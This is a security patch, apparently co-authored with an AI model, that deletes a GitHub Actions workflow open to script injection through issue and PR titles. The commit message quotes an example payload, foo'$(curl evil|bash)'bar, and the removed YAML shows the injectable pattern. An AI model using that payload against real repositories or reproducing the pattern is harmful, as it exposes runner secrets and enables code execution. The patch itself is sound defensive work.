From 3e1895357fefe860be51c4f56acd8621c51e9036 Mon Sep 17 00:00:00 2001
From: Itamar Hartstein
Date: Sat, 25 Apr 2026 14:18:27 +0300
Subject: [PATCH] security: remove vulnerable create_pylon_issue.yml workflow

This workflow interpolates `${{ github.event.issue.title }}` and `${{ github.event.pull_request.title }}` directly into `run:` shell steps. The surrounding single quotes around the curl `--data` payload do not protect against a quote-breakout in the title (e.g. `foo'$(curl evil|bash)'bar`), giving any GitHub user code execution on the runner with the workflow's GITHUB_TOKEN, PYLON_API_KEY, PYLON_ACCOUNT_ID, and PYLON_REQUESTER_ID.

The trigger surface is broad: `issues: opened` lets any user trigger it by opening an issue, and `pull_request_target: opened` runs in the base-repo context with access to base secrets against fork-controlled input.

Removing entirely for now; the auto-create-Pylon-ticket behavior can be reintroduced later with env-var indirection for user-controlled fields and an author_association gate.

Co-Authored-By: Claude Opus 4.7 (1M context)
---
 .github/workflows/create_pylon_issue.yml | 72 ------------------------
 1 file changed, 72 deletions(-)
 delete mode 100644 .github/workflows/create_pylon_issue.yml

diff --git a/.github/workflows/create_pylon_issue.yml b/.github/workflows/create_pylon_issue.yml
deleted file mode 100644
index a43dafd7d..000000000
--- a/.github/workflows/create_pylon_issue.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-name: Create Pylon Issue
-
-on:
- issues:
- types: [opened]
- pull_request_target:
- types: [opened]
-
-jobs:
- create_pylon_issue:
- runs-on: ubuntu-latest
- steps:
- - name: Install jq
- run: sudo apt-get install -y jq
-
- - name: Create Pylon Issue for GitHub Issue
- if: github.event_name == 'issues'
- run: |
- response=$(curl --request POST \
- --url https://api.usepylon.com/issues \
- --header 'Authorization: ${{ secrets.PYLON_API_KEY }}' \
- --header 'Content-Type: application/json' \
- --data '{
- "account_id": "${{ secrets.PYLON_ACCOUNT_ID }}",
- "requester_id": "${{ secrets.PYLON_REQUESTER_ID }}",
- "priority": "medium",
- "title": "${{ github.event.issue.title }}",
- "body_html": "GitHub Issue Details

GitHub Issue Details

Repository: ${{ github.repository }}

Type: Github Issue

URL: ${{ github.event.issue.html_url }}

 "
- }')
- ticket_id=$(echo $response | jq -r '.data.id')
- echo "ticket_id=$ticket_id" >> $GITHUB_ENV
-
- - name: Add Pylon ticket ID to issue body
- if: success()
- run: |
- issue_body=$(curl -s -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
- "https://api.github.com/repos/${{ github.repository }}/issues/${{ github.event.issue.number }}" | jq -r '.body')
- new_body="$issue_body"
- json_body=$(jq -R -s --arg body "$new_body" '{"body": $body}' <<< "$new_body")
- curl -X PATCH -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
- -H "Content-Type: application/json" \
- -d "$json_body" \
- "https://api.github.com/repos/${{ github.repository }}/issues/${{ github.event.issue.number }}"
-
- - name: Create Pylon Issue for Pull Request
- if: contains(github.event_name, 'pull_request')
- run: |
- response=$(curl --request POST \
- --url https://api.usepylon.com/issues \
- --header 'Authorization: ${{ secrets.PYLON_API_KEY }}' \
- --header 'Content-Type: application/json' \
- --data '{
- "account_id": "${{ secrets.PYLON_ACCOUNT_ID }}",
- "requester_id": "${{ secrets.PYLON_REQUESTER_ID }}",
- "priority": "high",
- "title": "${{ github.event.pull_request.title }}",
- "body_html": "GitHub Pull Request Details

GitHub Pull Request Details

Repository: ${{ github.repository }}

Type: Pull Request

URL: ${{ github.event.pull_request.html_url }}

 "
- }')
- ticket_id=$(echo $response | jq -r '.data.id')
- echo "ticket_id=$ticket_id" >> $GITHUB_ENV
-
- - name: Add Pylon ticket ID to PR body
- if: success()
- run: |
- pr_body=$(curl -s -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
- "https://api.github.com/repos/${{ github.repository }}/pulls/${{ github.event.pull_request.number }}" | jq -r '.body')
- new_body="$pr_body"
- json_body=$(jq -R -s --arg body "$new_body" '{"body": $body}' <<< "$new_body")
- curl -X PATCH -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
- -H "Content-Type: application/json" \
- -d "$json_body" \
- "https://api.github.com/repos/${{ github.repository }}/pulls/${{ github.event.pull_request.number }}"